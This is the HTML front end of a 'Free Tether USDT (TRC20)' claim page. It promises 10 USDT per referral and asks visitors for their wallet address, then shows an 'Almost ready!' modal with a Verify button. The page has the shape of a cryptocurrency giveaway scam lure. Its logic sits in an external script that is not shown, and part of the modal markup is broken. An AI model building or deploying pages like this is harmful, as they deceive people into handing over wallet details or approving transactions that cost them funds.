<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta property="og:title" content="Free Claimly USDT">
  <meta property="og:description" content="Share your referral link and get 10 USDT per each referral!">
  <meta property="og:image" content="https://cryptologos.cc/logos/tether-usdt-logo.png">
  <meta property="og:url" content="https://freeclaimly.com/referral">
  <meta property="og:type" content="website">
  <title>Free Tether USDT (TRC20)</title>
  <link rel="icon" href="img/202405152054040.png" type="image/png">
  <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
  <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.0/font/bootstrap-icons.css" rel="stylesheet">
  <link href="global.css" rel="stylesheet">
</head>
<body>
  <div class="login-container">
    <div class="login-logo">
      <img src="img/202405152054040.png" width="50" height="50">
    </div>
    <div class="login-title">
      <h2>Free Tether USDT (TRC20)</h2>
    </div>
    <form method="post" id="registrationForm">
      <input type="text" class="form-control login-input" name="referralCode" value="Sponsor ID" placeholder="Sponsor ID" readonly>
      <input type="text" class="form-control login-input" name="wallet" placeholder="Enter your wallet address" required oninvalid="this.setCustomValidity('Please enter your wallet address')" oninput="this.setCustomValidity('')">
      <button onclick = "verifyWalletAddress(event)" type="submit" class="btn custom-btn w-100">Continue</button>
    </form>
  </div>
  <!-- Modal-->
  <div class="modal fade" id="successModal" tabindex="-1" aria-labelledby="successModalLabel" aria-hidden="true">
    <div class="modal-dialog">
      <div class="modal-content">
        <div class="modal-body d-flex flex-column align-items-center" style="flex: 1;">
          <!-- Texto "Error" -->
          <h5 class="mt-4 mb-2" id="successModalLabel" style="font-weight: bold;">Almost ready!</h5>
             </a>
              <button type="submit" class="btn custom-btn w-100">
                <i class="bi bi-check"></i> Verify
              </button>
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
  <!-- Modal de Error -->
  <div class="modal fade" id="errorModal" tabindex="-1" aria-labelledby="errorModalLabel" aria-hidden="true">
    <div class="modal-dialog">
      <div class="modal-content">
        <div class="modal-body d-flex flex-column align-items-center">
          <!-- Icono de Error -->
          <i class="fas fa-times-circle" style="color: red; font-size: 40px; margin-top: 20px;"></i>
                
                <!-- Texto "Error" -->
          <h5 class="mt-4 mb-2" id="errorModalLabel" style="font-weight: bold;">Try again</h5>
          <!-- Botón OK -->
          <button type="button" class="btn btn-danger w-100" data-dismiss="modal">OK</button>
        </div>
      </div>
    </div>
  </div>
  <script src="script.js"></script>
</body>
</html>
